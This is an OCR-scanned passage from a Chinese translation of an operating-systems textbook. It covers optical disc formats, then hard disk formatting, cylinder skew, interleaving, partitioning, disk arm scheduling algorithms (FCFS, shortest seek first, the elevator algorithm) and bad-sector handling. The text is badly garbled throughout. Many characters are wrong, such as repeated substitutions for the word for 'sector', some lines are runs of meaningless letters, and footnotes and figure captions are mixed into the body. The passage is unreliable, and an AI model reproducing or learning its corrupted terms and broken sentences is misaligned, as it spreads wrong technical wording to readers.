压 入 单 层 盘 中 ， 或 者 将 50GB 压 入 双 层 盘 中 。 另 一 种 设备 是 HD DVD |! 
， 它 使 用 相同 的 查 色 激光 ， 但 是 容量 只 有 15 GB ( 单 层 ) 或 者 30 GB 
CWE) 。 这 种 格式 之 战 将 电影 制 片 广 、 计 算 机 制造 商 和 软件 公司 割 
裂 开 来 。 缺 乏 标准 的 结果 是 ， 这 一 代 DVD 推 广 得 非常 慢 ， 因 为 消费 者 
企 等 待 着 尘埃 落 定 ， 看 哪 一 个 格式 胜出 。 产 业界 这 些 愚蠢 的 行为 让 人 
想起 George Santayana l! 的 名 言 : “不 能 以 史 为 鉴 的 人 注定 要 重 蹈 履 
iL” o 


[1] MPG 是 Miles Per Gallon 的 缩写 ， 即 每 加 仑 燃油 可 以 跑 多 少 英 里。 各 
国政 府 对 车 辆 燃油 经 济 性 的 要 求 越 来 越 高 ， 目 前 30 MPG 标 准 成 为 衡量 
各 家 公司 车 型 竞争 力度 的 标杆 。 一 一 译 者 注 

[2] 该 编码 系统 称 为 EFM (Eight to Fourteen Modulation，8 到 14 调 制 ) 
编码 ， 就 是 把 一 个 8 位 的 数据 ( 即 1 个 字 节 ) 用 14 位 编码 来 表示 。 一 一 
FEE 

[3] 此 处 的 描述 不 甚 准确 。 在 588 位 的 一 帧 数据 中 ， 有 24 位 同步 信息 
(这 24 位 同步 位 不 经 EFM 编 码 ) 和 33 个 数据 字 节 〈 每 个 字 节 经 过 14 位 


EFM 编 码 ) 。 在 33 个 数据 字 市 中 ， 包 含有 效 数 据 (BORA RET) 24 
字 节 ， 其 余 9 字 忆 用 于 控制 和 校 验 。 为 了 确保 读 出 信号 的 可 靠 性 ， 每 个 
编码 字 之 间 揪 入 3 位 结合 位 ， 在 帧 尾 还 有 3 位 结合 位 ， 因 此 一 帧 的 长 度 
为 24+33x14+34x3=588 位 。 


[4] NC17 代 表 No Children Under 17 Admitted， 即 17 岁 以 下 儿童 不 得 观 
看 o 
[5] HD 代表 High Density (高 密度 ) 

治 . 桑 塔 亚 纳 ，1863-1952) ， 美 国 著名 哲学 


[6] George Santayana (JF 


K` RFX 译 者 注 


5.4.2 RTEA 


人 硬盘 由 一 千 铝 的 、 合 金 的 或 玻璃 的 盘 片 组 成 ， 直 径 为 5.25 英 寸 或 
3.5 英 寸 (在 笔记 本 电脑 上 甚至 更 小 ) 。 在 每 个 强 厂 上 沉积 着 落 薄 的 可 
磁化 的 金属 氧化 物 。 在 制造 出 来 之 后 ， 磁 盘 上 不 存在 任何 信息 。 


在 磁盘 能 够 使 用 之 前 ， 每 个 盘 片 必须 经 受 由 软件 完成 的 低级 格式 
化 (low-level format) 。 该 格式 包含 一 系列 同心 的 磁道 ， 每 个 磁道 包含 
若干 数目 的 扇 区 ， 扇 区 间 存 在 短 的 间 除 。 一 个 扇 区 的 格式 如 图 5-25 所 


7N ° 


图 5-25 一 个 人 磁盘 肩 区 


前 导 码 以 一 定 的 位 模式 开始 ， 位 模式 使 硬件 得 以 识别 届 区 的 开 
始 。 前 导 码 还 包含 柱 面 与 面 区 号 以 及 有 茶 些 其 他 人 信息。 数据 部 分 的 大 小 
征 由 低级 格式 化 程序 决定 的 ， 大 多 数 磁 到 使 用 512 字 世 的 硬 区 。ECC 域 
包含 见 余 信息 ， 可 以 用 来 恢复 读 错误 。 该 域 的 大 小 和 内 容 随 生产 商 的 
不 同 而 不 同 ， 它 取决 于 设计 者 为 了 更 高 的 可 靠 性 愿意 放弃 多 少 人 磁盘 空 
间 以 及 控制 右 能 够 处 理 的 ECC 编 码 有 多 复杂 。16 字 市 的 ECC 域 并 不 是 


罕见 的 。 此 外 ， 所 有 硬盘 都 分 配 有 某 些 数目 的 备用 局 区 ， 用 来 取代 具 
A itil Ta BCA E X. o 


AIX BRS, Mie L Om KN SB“ ee 
偏 移 。 这 一 偏 移 称 为 柱 面 斜 进 (cylinder skew) ， 这 样 做 是 为 了 改进 性 
能 ， 想 法 是 让 磁盘 在 一 次 连续 的 操作 中 读 取 多 个 磁道 而 不 丢失 数据 。 
观察 图 5-19a 束 可 以 明日 问题 的 本 质 。 假 设 一 个 读 请 求 需 要 最 内 侧 磁 道 
上 从 第 0 怖 区 开始 的 18 个 而 区 ， 磁 副 旋 转 一 周 可 以 读 取 前 16 个 局 区 ,但 
古 为 了 得 到 第 17 个 届 区 ， 则 知 要 一 次 寻 道 操作 以 便 磁头 向 外 移动 一 个 
磁道 。 到 磁头 移动 了 一 个 磁道 时 ， 第 0 而 区 已 经 转 过 了 磁头， 所 以 需要 
旋转 一 整 周 才能 等 到 它 再 次 经 过 人 磁头。 通过 和 岁 5-26 所 示 的 将 局 区 偶 移 即 


可 消除 这 一 问题 。 


Al 5-26 柱 面 斜 进 示意 图 


柱 面 斜 进 量 取决 于 驱动 旧 的 几何 规格 。 例 如 ， 一 个 10 000rpm 的 驱 
动 器 每 6ms 旋 转 一 周 ， 如 果 一 个 人 磁道 包含 300 个 悄 区 ， 那 么 每 20ps 束 有 
一 个 新 鹿 区 在 磁头 下 通过 。 如 有 果 磁 道 到 磁道 的 寻 道 时 间 是 800hs， 那 么 
在 寻 道 期 间 将 有 40 个 忆 区 通过 ， 所 以 柱 面 斜 进 应 该 是 40 个 请 区 而 不 是 


Al5s-26 FA =A ° (E48 hE, AMER EE aR 
进 (head skew) , {Hee RHE ETE ATK ° 
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给 定 类 型 的 所 有 位 副 在 出 三 时 具有 完全 相同 的 容量 ， 与 它们 实际 具有 
多 少 坏 司 区 无 天 (如 果 坏 局 区 的 数目 超出 了 备用 怖 区 的 数目 ， 则 该 驱 
动 器 是 不 合格 的 ， 不 会 出 三 ) 。 


关于 磁盘 容量 存在 着 相当 大 的 混 清 ， 这 是 因为 某 些 制造 商 广 告 宣 
传 的 是 未 格式 化 的 容量 ， 从 而 使 他 们 的 驱动 器 看 起 来 比 实际 的 容量 要 
大 。 例 如 ， 考 虑 一 个 未 格式 化 容量 为 200x10? 字 贡 的 驱动 器 ， 它 或 许 是 
作为 200GB 的 位 盘 销 售 的 。 然 而 ， 格 式 化 之 后 ， 也 许 只 有 170x10? FI 
可 用 于 存放 数据 。 使 这 一 混 消 进一步 加 剧 的 是 操作 系统 可 能 将 这 一 容 
量 报 告 为 158GB， 而 不 是 170GB， 因 为 软件 把 JGB 看 作 是 239 (1073 


741 824) 字 节 ， 而 不 是 10? (1000000000) 字 节 。 


在 数据 通信 世界 里 ，1Gbps 意 味 着 1 000 000 000 位 / 秒 ， 因 为 前 级 G 
(E) 确实 表示 109 (毕竟 一 千 米 是 1000 米 ， 而 不 是 1024 米 ) ， 所 以 使 
事情 更 加 糟糕 。 只 有 在 关于 内 存 和 磁盘 的 大 小 的 情况 下 ，kilo (F) > 
mega (Jk) 、giga ( 吉 ) 和 tera (A) 才 分 别 表示 210 >22 ~ 230 和 240 


格式 化 还 对 性 能 产生 影响 。 如 果 一 个 10 000RPM 的 磁盘 每 个 磁道 有 
300 个 局 区 ， 每 个 局 区 512 字 节 ， 那 么 用 6ms 可 以 读 出 一 个 磁道 上 的 153 
600 字 入 ， 使 数据 率 为 25 600 000 字 证 / 秒 或 24.4 MB/s。 不 论 引 入 什么 种 
类 的 接口 ， 都 不 可 能 比 这 个 速度 更 快 ， 即 便 是 80 MB/s 或 160 MB/s 的 
SCSI 接 口 也 不 行 。 


实际 上 ， 以 这 一 速率 连续 地 读 磁 到 要求 控 制 钴 中 有 一 个 大 容量 的 
缓冲 区 。 例 如 ， 考 虑 一 个 控制 共 ， 它 具有 一 个 而 区 的 缓冲 区 ， 该 控制 
绥 接 到 一 条 命令 要 读 两 个 连续 的 硬 区 。 当 从 磁盘 上 读 出 第 一 个 硬 区 并 
做 了 ECC 计 算 之 后 ， 数 据 必 须 传 送 到 主 存 中 。 就 在 传送 正在 进行 时 ， 
下 一 个 恒 区 将 从 磁头 下 通过 。 当 完成 了 辐 主 存 的 复制 时 ， 探 制 套 将 不 
得 不 等 待 几乎 一 整 周 的 旋转 时 间 才 能 等 到 第 二 个 情 区 再 次 回来 。 


通过 在 格式 化 磁盘 时 以 交错 方式 对 司 区 进行 编号 可 以 消除 这 一 问 
题 。 在 图 5-27a 中 ， 我 们 看 到 的 是 通常 的 编号 模式 (此 处 忽 上 略 柱 面 斜 
进 ) 。 在 图 5-27b 中 ， 我 们 看 到 的 是 单 交 错 (single interleaving) ， 它 可 
以 在 连续 的 届 区 之 间 给 控制 絮 以 电 居 的 空间 以 便 将 缓冲 区 复制 到 主 
- 
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a) b) c) 


Al 5-27 a) 无 交错 ; b) 单 交错 ; c) 双 交错 


如 果 复 制 过 程 非常 慢 ， 可 能 需要 如 图 5-27c 中 的 双 交 错 (double 
interleaving) 。 如 果 控 制 器 拥有 的 缓冲 区 只 有 一 个 局 区 ， 那 么 从 缓冲 区 
到 主 存 的 复制 无 论 生 由 控制 邵 完 成 还 是 由 主 CPU 或 着 DMA 芯 片 完成 都 
无 关 紧 要 ， 都 要 伦 费 某 些 时 间 。 为 了 避免 需要 交错 ， 控 制 右 应 该 能 够 
对 整个 磁道 进行 缓存 ， 许 多 现代 控制 器 都 能 够 这 样 做 。 


在 低级 格式 化 完成 之 后 ， 要 对 人 磁盘 进行 分 多。 在 逻辑 上 ， 每 个 分 
区 就 像 是 一 个 独立 的 磁盘 。 分 区 对 于 多 个 操作 系统 共存 是 必需 的 。 此 
外 ， 在 某 些 情况 下 ， 分 区 可 以 用 来 进行 交换 。 在 Pentium 和 大 多 数 其 他 
计算 机 上 ，0 记 区 包含 主 引导 记录 (master boot record) ， 它 包含 某 些 
引导 代码 和 末尾 的 分 区 表 。 分 区 表 给 出 了 每 个 分 区 的 起 始 局 区 和 大 
小 。 在 Pentium 上 ， 分 区 表 具 有 四 个 分 区 的 空间 。 如 采 这 四 个 分 区 都 用 
于 Windows， 那 么 它们 将 被 称 为 C:、D:、E: 和 F:， 并 且 作 为 单独 的 驱动 
狼 对 得 。 如 果 它 们 中 有 三 个 用 于 Windows 一 个 用 于 UNIX， 那 么 


Windows 会 将 它 的 分 区 称 为 C:、D: 和 E:， 然 后 第 一 个 CD-ROM 是 F:。 为 
了 能 够 从 硬盘 引导 ， 在 分 区 表 中 必须 有 一 个 分 区 被 标记 为 活动 的 。 


在 准备 一 块 磁 一 以 便于 使 用 的 最 后 一 步 是 对 每 一 个 分 区 分 别 执行 
一 次 高 级 格式 化 (high-level format) 。 这 一 操作 要 设置 一 个 引导 块 、 
空间 存储 管理 (空间 列表 或 位 图 ) 、 根 目录 和 一 个 空 文件 系统 。 这 一 
操作 还 要 将 一 个 代码 设置 在 分 区 表 项 中 ， 以 表明 在 分 区 中 使 用 的 古 哪 
个 文件 系统 ， 因 为 许多 操作 系统 文 持 多 个 兼容 的 文件 系统 (由 于 历史 
RA) 。 这 时 ， 系 统 就 可 以 引导 了 。 


5.4.3 RS MERIA 


本 人 小节 我 们 将 一 般 地 讨论 与 磁盘 张 动 程序 有 关 的 几 个 问题 。 首 
先 ， 考 虚 读 或 者 写 一 个 人 磁盘 块 需要 多 长 时 间 。 这 个 时 间 由 以 下 三 个 因 
素 决 定 : 


1) 寻 道 时 间 〈 将 磁 到 臂 移动 到 适当 的 柱 面 上 所 需 的 时 间 ) 。 
2) 旋 转 延 迟 (等 待 适当 局 区 旋转 到 磁头 下 所 需 的 时 间 ) 。 
3) 实 际 数据 传输 时 间 。 


对 大 多 数 磁 副 而 言 ， 寻 道 时 间 与 男 外 两 个 时 间 相 比 占 主导 地 位 ， 
所 以 减少 平均 寻 道 时 间 可 以 充分 地 改 秋 系统 性 能 。 


如 果 磁 盘 驱 动 程序 每 次 接收 一 个 请 求 并 按照 接收 顺序 完成 请 求 ， 
即 先 来 先 服务 (First-Come，First-Served，FCFS) ， 则 很 难 优化 寻 道 时 
间 。 然 而 ， 当 磁盘 负载 很 重 时 ， 可 以 采用 其 他 策略 。 很 有 可 能 当 人 磁盘 
幢 为 一 个 请 求 寻 道 时 ， 其 他 进程 会 产生 其 他 磁盘 请 求 。 许 多 磁盘 驱动 
程序 都 维护 着 一 张 表 ， 该 表 按 柱 面 号 索引 ， 每 一 柱 面 的 未 完成 的 请 求 
组 成 一 个 链表 ， 链 表 头 存放 在 表 的 相应 表 目 中 。 


给 定 这 种 数据 结构 ， 我 们 可 以 改进 先 来 先 服务 调度 算法 。 为 了 说 
明 如 何 实现 ， 考 虑 一 个 具有 40 个 柱 面 的 假想 的 磁 副 。 假 设 读 柱 面 1 上 一 


个 数据 块 的 请 求 到 达 ， 当 对 柱 面 11 的 寻 道 正在 进行 时 ， 又 按 顺 序 到 达 
了 对 柱 面 1、36、16、34、9 和 12 的 请 求 ， 则 让 它们 进入 未 完成 的 请 求 
表 ， 每 一 个 柱 面 对 应 一 个 单独 的 链表 。 图 5-28 显 示 了 这 些 请 求 。 


初始 位 置 ”未 完成 的 请 求 


EP TTT TTT x bx Ex 
0 5 10 15 


TETES 
30 


20 25 35 m 


寻 道 顺序 


一 一 时间 


图 5-28 最 短 寻 道 优先 (SSF) ARVER IE 


当前 请 求 (请 求 柱 面 11) 结束 后 ， 人 磁盘 驱动 程序 要 选择 下 一 次 处 
理 哪 一 个 请 求 。 耕 使 用 FCFS 算 法 ， 则 首先 选择 柱 面 1， 然 后 是 36， 以 此 
类 推 。 这 个 算法 要 求 磁 副 辟 分 别 移动 10、35、20、18、25 和 3 个 柱 面 ， 
总 共 需 要 移动 111 个 柱 面 。 


另 一 种 方法 是 下 一 次 总 是 处 理 与 磁头 距离 最 近 的 请 求 以 使 寻 道 时 
间 最 小 化 。 对 于 图 5-28 中 给 出 的 请 求 ， 选 择 请 求 的 顺序 如 图 5-28 中 下 方 
的 折线 所 示 ， 依 次 为 12、9、16、1、34 和 36。 按 照 这 个 顺序 ， 磁 盘 臂 
分 别 需要 移动 1、3、7、15、33 和 2 个 柱 面 ， 总 共 需 要 移动 61 个 柱 面 。 
这 个 算法 即 最 短 寻 道 优先 (Shortest Seek First, SSF) ， 与 FCFS 算 法 相 
比 ， 该 算法 的 磁盘 臂 移动 几乎 减少 了 一 半 。 


但 是 ，SSF 算 法 存在 一 个 问题 。 假 设 当 图 5-28 所 示 的 请 求 正在 处 理 
时 ,不断 地 有 其 他 请 求 到 达 。 例 如 ， 磁 副 辟 移 到 柱 面 16 以 后 ， 到 达 一 
个 对 柱 面 8 的 新 请 求 ， 那 么 它 的 优先 级 将 比 柱 面 1 要 高 。 如 果 接着 义 到 
达 了 一 个 对 柱 面 13 的 请 求 ， 磁 盘 辟 将 移 到 柱 面 13 而 不 是 柱 面 1。 如 果 磁 
盘 人 负载 很 重 ， 那 么 大 部 分 时 间 磁 盘 辟 将 停留 在 磁盘 的 中 部 区 域 ， 而 两 
端 极端 区 域 的 请 求 将 不 得 不 等 待 ， 直 到 负载 中 的 统计 波动 使 得 中 部 区 
域 没 有 请 求 为 止 。 远 离 中 部 区 域 的 请 求 得 到 的 服务 很 差 。 因 此 获得 最 
小 响应 时 间 的 目标 和 公平 性 之 间 存 在 着 冲突 。 


高 层 建 筑 也 要 进行 这 种 权衡 处 理 ， 高 层 建 筑 中 的 电梯 调度 问题 和 
磁盘 辟 调 度 很 相似 。 电 梯 请 求 不 断 地 到 来 ， 随 机 地 要 求 电 梯 到 各 个 楼 
jZ SETH) 。 控 制 电梯 的 计算 机 能 够 很 容易 地 跟踪 顾客 按 下 请 求 按钮 
的 顺序 ， 并 使 用 FCFS 或 者 SSF 为 他 们 提供 服务 。 


然而 ， 大 多 数 电 梯 使 用 一 种 不 同 的 算法 来 协调 效率 和 公平 性 这 两 
个 相互 冲突 的 目标 。 电 梯 保 持 按 一 个 方向 移动 ， 直 到 在 那个 方向 上 没 
有 请 求 为 止 ， 然 后 改变 方向 。 这 个 算法 在 磁盘 世界 和 电梯 世界 都 被 称 
为 电梯 算法 (elevator algorithm) ， 它 需要 软件 维护 一 个 二 进 制 位 ， 即 
当前 方向 位 : UP (向 上 ) 或 是 DOWN (向 下 ) 。 当 一 个 请 求 处 理 完 之 
后 ， 磁 盘 或 电梯 的 驱动 程序 检查 该 位 ， 如 果 是 UP， 磁 盘 臂 或 电梯 舱 移 
至 下 一 个 更 高 的 未 完成 的 请 求 。 如 果 更 高 的 位 置 没有 未 完成 的 请 求 ， 


则 方向 位 取 反 。 当 方向 位 设置 为 DOWN 时 ， 同 时 存在 一 个 低位 置 的 请 
求 ， 则 移 向 该 位 置 。 


图 5-29 显 示 了 使 用 与 图 5-28 相 同 的 7 个 请 求 的 电梯 算法 的 情况 。 假 
设 方向 位 初始 为 UP， 则 各 柱 面 获得 服务 的 顺序 是 12、16、34、36、9 和 
1， 人 磁盘 臂 分 别 移动 1、4、18、2、27 和 8 个 柱 面 ， 总 共 移 动 60 个 柱 面 。 
在 本 例 中 ， 电 梯 算 法 比 SSF 还 要 稍微 好 一 点 ， 尽 管 通常 它 不 如 SSF。 电 
梯 算 法 的 一 个 优良 特性 是 对 任意 的 一 组 给 定 请 求 ， 人 磁盘 臂 移动 总 次 数 
的 上 界 是 固定 的 : 正好 是 柱 面 数 的 两 倍 。 
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图 5-29 调度 磁盘 请 求 的 电梯 算法 


对 这 个 算法 稍 加 改进 可 以 在 啊 应 时 间 上 具有 更 小 的 变异 (Teory, 
1972) ， 方 法 是 总 是 按 相同 的 方向 进行 扫描 。 当 处 理 完 最 高 编号 柱 面 
上 未 完成 的 请 求 之 后 ， 磁 强 臂 移动 到 具有 未 完成 的 请 求 的 最 低 编 号 的 
柱 面 ， 然 后 继续 沿 同 上 的 方 同 移动 。 实 际 上 ， 这 相当 于 将 最 低 编 号 的 
柱 面 看 作 是 最 高 编写 的 柱 面 之 上 的 相 邻 柱 面 。 
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号 。 对 于 这 种 磁盘 控制 化， 还 可 以 进行 另 一 种 优化 。 如 采 针 对 同一 柱 
面 有 两 个 或 多 个 请 求 正 等 竺 处 理 ， 驱 动 程序 可 以 发 出 请 求 读 写 下 一 次 
要 通过 磁头 的 而 区 。 注 意 ， 当 一 个 柱 面 有 多 条 磁道 时 ， 相 继 的 请 求 可 
能 针对 不 同 的 磁道 ， 故 没有 任何 代价 。 因 为 选择 磁头 既 不 需要 移动 磁 
盘 辟 也 没有 旋转 延迟 ， 所 以 控制 器 几乎 可 以 立即 选择 任意 磁 涉 。 


如 果 磁 盘 具 有 寻 道 时 间 比 旋转 延迟 快 很 多 的 特性 ， 那 么 应 该 使 用 
不 同 的 优化 策略 。 未 完成 的 请 求 应 该 按 扇 区 号 排序 ， 并 且 当下 一 个 记 
区 就 要 通过 磁头 的 时 候 ， 磁 盘 臂 应 该 飞快 地 移动 到 正确 的 磁道 上 对 其 
进行 读 或 者 写 。 


对 于 现代 硬盘， 寻 道 和 旋转 延迟 古 如 此 影响 性 能 ， 所 以 一 次 只 读 
取 一 个 或 两 个 书 区 的 效率 是 非 芝 低下 的 。 由 于 这 个 原因 ， 许 多 位 僵 欣 
制 器 总 是 读 出 多 个 而 区 并 对 其 进行 高 速 缓存 ， 即 使 只 请 求 一 个 而 区 时 
也 是 如 此 。 上 典型 地 ， 读 一 个 局 区 的 任何 请 求 将 导致 该 司 区 和 当前 磁道 
的 多 个 或 者 所 有 剩余 的 恒 区 被 读 出 ， 读 出 的 而 区 数 取 决 于 控制 絮 的 高 
速 缓存 中 有 多 少 可 用 的 至 间 。 例 如 ， 在 图 5-18 所 摘 述 的 磁 一 中 有 4MB 
的 高 速 缓存 。 高 速 缓存 的 使 用 是 由 控制 锅 动 态 地 决定 的 。 在 最 简单 的 
模式 下 ， 高 速 缓存 被 分 成 两 个 区 段 ， 一 个 用 于 读 ， 一 个 用 于 写 。 如 果 
后 来 的 读 操 作 可 以 用 控制 器 的 高 速 缓存 来 满足 ， 那 么 束 可 以 立即 返回 
极 请 求 的 数据 。 


值得 注意 的 是 ， 人 磁盘 控制 器 的 高 速 缓存 完全 独立 于 操作 系统 的 高 
速 缓存 。 控 制 器 的 高 速 组 存 通常 保存 还 没有 实际 被 请 求 的 块 ， 但 是 这 
对 于 读 操 作 是 很 便利 的 ， 因 为 它们 只 是 作为 某 些 其 他 读 操 作 的 附 这 效 
应 而 恰巧 要 在 磁头 下 通过 。 与 之 相反 ， 操 作 系统 所 维护 的 任何 高 速 组 
存 由 显 式 地 读 出 的 块 组 成 ， 并 且 操 作 系统 认为 它们 在 较 近 的 将 来 可 能 
再 次 需要 〈 例 如 ， 保 存 目录 块 的 一 个 磁盘 块 ) 。 


当 同 一 个 控制 历 上 有 多 个 碟 动 郁 时 ， 操 作 系统 应 该 为 每 个 驱动 郁 
都 单独 地 维护 一 个 未 完成 的 请 求 表 。 一 旦 任何 一 个 驱动 硕 鹤 闲 下 来 ， 
就 应 该 发 出 一 个 寻 道 请 求 将 磁盘 辟 移 到 下 一 个 将 被 请 求 的 柱 面 处 ( 假 
WE tla ITB BE) 。 当 前 传输 结束 时 ， 将 检查 是 否 有 驱动 器 的 
磁盘 辟 位 于 正确 的 柱 面 上 。 如 采 存 在 一 个 或 多 个 这 样 的 驱动 器 ， 则 在 
磁盘 壁 已 经 位 于 正确 柱 面 处 的 驱动 器 上 开始 下 一 次 传输 。 如 有 果 没 有 驱 
动 器 的 磁 副 辟 处 于 正确 的 位 置 ， 则 驱动 程序 在 刚刚 完成 传输 的 驱动 恬 
上 发 出 一 个 新 的 寻 道 命令 并 且 等 待 ， 直 到 下 一 次 中 断 到 来 时 检查 哪 一 
个 磁盘 臂 首 先 到 达 了 目标 位 置 。 


上 面 所 有 的 磁 强 调度 算法 都 是 默认 地 假设 实际 磁盘 的 几何 规格 与 
虚拟 几何 规格 相同 ， 认 识 到 这 一 点 十 分 重要 。 如 有 果 不 生 这 样 ， 那 么 调 
度 磁 盘 请 求 就 毫 无 意义 ， 因 为 操作 系统 实际 上 不 能 断定 柱 面 40 与 柱 面 
200 哪 一 个 与 柱 面 39 更 接近 。 画 一 方面 ， 如 采 磁 盘 控 制 大 能 够 接收 多 个 


未 完成 的 请 求 ， 它 就 可 以 在 内 部 使 用 这 些 调度 算法 。 在 这 样 的 情况 
下 ， 算 法 仍然 是 有 效 的， 但 是 低 了 一 个 层次 ， 局 限 在 控制 絮 内 部 。 


5.4.4 ”错误 处 理 


人 磁盘 制造 商 通 过 不 断 地 加 大 线性 位 密度 而 持续 地 推进 技术 的 极 
限 。 在 一 块 5.25 英 寸 的 磁盘 上 ， 处 于 中 间 位 置 的 一 个 磁道 大 约 有 300mm 
的 周 长 。 如 果 该 磁道 存放 300 个 512 字 节 的 扇 区 ， 考 虑 到 由 于 前 导 码 、 
ECC 和 局 区 间 辽 而 损失 了 部 分 空间 这 样 的 实际 情况 ， 线 性 记录 密度 大 
约 是 5000b/mm。 记 录 5000b/mm 需 要 极其 均匀 的 基 片 和 非常 精细 的 氧化 
物 涂 层 。 但 是 ， 按 照 这 样 的 规范 制造 磁盘 而 没有 瑕 六 是 不 可 能 的 。 一 
旦 制造 技术 改进 到 一 种 程度 ， 即 在 那样 的 密度 下 能 够 无 瑕 辛 地 操作 ， 
磁盘 设计 者 就 会 转 到 更 高 的 密度 以 增加 容量 。 这 样 做 可 能 会 再 次 引入 
FEC ° 
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束 不 可 能 被 掩盖 。 


对 于 坏 块 存在 两 种 一 般 的 处 理 方法 .在 控制 絮 中 对 它们 进行 处 理 
或 者 在 操作 系统 中 对 它们 进行 处 理 。 在 前 一 种 方法 中 ， 人 磁 副 在 从 工厂 
出 三 之 前 要 进行 测试 ， 并 且 将 一 个 坏 届 区 列表 写 在 人 磁盘 上 。 对 于 每 一 
个 坏 局 区 ， 用 一 个 备用 局 区 替换 它 。 
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表 来 跟踪 这 一 信息 〈 每 个 磁道 一 张 表 ) ， 或 者 通过 重 写 前 导 码 来 给 出 
重 映射 的 局 区 号 。 如 果 是 重 写 前 导 码 ， 那 么 图 5-30c 的 方法 束 要 做 更 多 
的 工作 (因为 23 个 前 导 码 必须 重 写 ) ， 但 是 最 终 会 提供 更 好 的 性 能 ， 
因为 整个 磁道 仍然 可 以 在 旋转 一 周 中 读 出 。 


图 5-30 a 具 有 一 个 坏 忆 区 的 磁盘 磁道 ; p) 用 备用 扇 区 蔡 换 坏 书 区 : 
0 移动 所 有 山区 以 回避 坏 怖 区 


驱动 絮 安 装 之 后 在 正常 工作 期 间 也 会 出 现 错误 。 在 直到 ECC 不 能 
处 理 的 错误 时 ， 第 一 道 防 线 只 是 试图 再 次 读 。 某 些 读 错误 是 瞬时 性 
的 ， 也 整 是 说 是 由 磁头 下 的 灰 侍 导致 的 ， 在 第 二 次 竹 试 时 错误 整 消失 
了 。 如 果 控 制 邵 注意 到 它 在 某 个 扇 区 遇 到 重复 性 的 错误 ， 那 么 可 以 在 


该 悄 区 完全 死 挥 之 前 切换 到 一 个 备用 届 区 。 这 样 束 不 会 丢失 数据 并 且 
操作 系统 和 用 户 甚至 都 不 会 注意 到 这 一 问题 。 通 各 使 用 的 是 图 5-30b 的 
方法 ， 因 为 其 他 届 区 此 刻 可 能 包含 数据 。 而 使 用 图 5-30c 的 方法 则 不 但 
要 重 写 前 导 码 ， 还 要 复制 所 有 的 数据 。 


前 面 我 们 曾 说 过 存在 两 种 一 般 的 处 理 错误 的 方法 : FER ll PE 
者 在 操作 系统 中 处 理 错误 。 如 果 控 制 絮 不 具有 像 我 们 已 经 讨论 过 的 那 
样 透明 地 重 映射 而 区 的 能 力 ， 那 么 操作 系统 必须 在 软件 中 做 同样 的 事 
情 。 这 和 意味 着 操作 系统 必须 首先 获得 一 个 坏 耐 区 列表 ， 或 者 是 通过 从 
人 磁 司 中 读 出 该 列表 ， 或 者 只 是 由 它 目 己 测试 整个 磁盘 。 一 旦 操作 系统 
知道 哪些 而 区 是 坏 的 ， 它 就 可 以 建立 重 映 射 表 。 如 果 操 作 系统 想 使 用 
图 5-30c 的 方法 ， 它 就 必须 将 局 区 7 到 局 区 29 中 的 数据 问 上 移动 一 个 局 
区 。 


如 有 果 由 操作 系统 处 理 重 映射 ， 那 么 它 必 须 确 保 坏 扇 区 不 出 现在 任 
何 文件 中 ， 并 且 不 出 现在 空 内 列表 或 位 图 中 。 做 到 这 一 点 的 一 种 方法 
是 创建 一 个 包含 所 有 坏 忆 区 的 秘密 的 文件 。 如 果 该 文件 不 被 加 入 文件 
AS, APRAS RINE (Bea, PERE) 。 


然而 ， 还 存在 另 一 个 问题 : tt ° WR EPOCH PEE 
地 做 备份 ， 那 么 非常 重要 的 是 备份 实用 程序 不 去 笑 试 复制 坏 块 文件 。 
为 了 防止 发 生 这 样 的 事情 ， 操 作 系统 必须 很 好 地 隐藏 坏 块 文件 ， 以 至 
于 备份 实用 程序 也 不 能 发 现 它 。 如 有 果 和 磁盘 是 一 个 忆 区 一 个 而 区 地 做 备 


份 而 不 古 一 个 文件 一 个 文件 地 做 备份 ， 那 么 在 备份 期 间 防止 读 错误 是 
十 分 困难 的 ， 如 果 不 是 不 可 能 的 话 。 惟 一 的 希望 是 备份 程序 具有 足够 
的 智能 ， 在 读 失 败 10 次 后 放弃 并 且 继 续 下 一 个 而 区 。 


坏 忆 区 不 是 惟一 的 错误 来 源 ， 也 可 能 发 生 磁盘 臂 中 的 机 械 故 障 引 
起 的 寻 道 错误 。 控 制 右 内 部 跟踪 着 磁盘 臂 的 位 置 ， 为 了 执行 寻 道 ， 它 
发 出 一 系列 脉 名 给 磁盘 臂 电机 ， 每 个 柱 面 一 个 脉冲 ， 这 样 将 磁 强 臂 移 
到 者 的 柱 面 。 当 磁盘 臂 移 到 其 目标 位 置 时 ， 控 制 句 从 下 一 个 而 区 的 前 
导 码 中 读 出 实际 的 柱 面 号 。 如 果 磁 盘 臂 在 错误 的 位 置 上 ， 则 发 生 寻 道 
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an (包括 Pentium 的 ) 只 是 设置 一 个 错误 标志 位 而 把 余下 的 工作 留 给 驱 
动 程序 。 张 动 程序 对 这 一 错误 的 处 理 办 法 是 发 出 一 个 recalibrate (重新 
校准 ) 命令 ， 让 磁盘 臂 尽 可 能 地 向 最 外 面 移动 ， 并 将 控制 器 内 部 的 当 
前 柱 面 重 置 为 0。 通常 这 样 束 可 以 解决 问题 了 。 如 果 还 不 行 ， 则 只 好 修 
ERIK Dar ° 


正如 我 们 已 经 看 到 的 ， 控 制 如 实际 是 一 个 专用 的 小 计算 机 ， 它 有 
软件 、 变 量 、 绥 冲 区 ， 侦 尔 还 出 现 故 障 。 有 时 一 个 不 寻常 的 事件 序 
列 ， 例 如 一 个 驱动 右 发 生 中 断 的 同时 为 一 个 驱动 胡 发 出 recalibrate 命 
令 ， 束 可 能 引发 一 个 故障 ， 导 致 控制 器 陷入 一 个 循环 或 失去 对 正在 做 
的 工作 的 跟 蹊 。 探 制 奏 的 设计 着 通 利 考虑 到 最 坏 的 情形 ， 在 心 片上 近 


供 了 一 个 引 脚 ， 当 该 引 脚 被 置 起 时 ， 迫 使 控制 器 起 记 它 正在 做 的 任何 
事情 并 且 将 其 自身 复位 。 如 有 果 其 他 方法 都 失败 了 ， 磁 盘 张 动 程序 可 以 
设置 一 个 控制 位 以 触发 该 信号 ， 将 控制 如 复位 。 如 果 还 不 成 功 ， 驱 动 
程序 所 能 做 的 就 是 打印 一 条 消息 并 且 放 弃 。 


重新 校准 一 块 磁盘 会 发 出 古怪 的 噪音 ， 但 是 正常 工作 时 并 不 让 人 
烦 扰 。 然 而 ， 存 在 这 样 一 种 情形 ， 对 于 具有 实时 约束 的 系统 而 言 重新 
校准 是 一 个 严重 的 问题 。 当 从 硬盘 播放 视频 时 ， 或 者 当 将 文件 从 硬 副 
烧 录 到 CD-ROM 上 时 ， 来 自 硬盘 的 位 流 以 均匀 的 速率 到 达 是 必需 的 。 
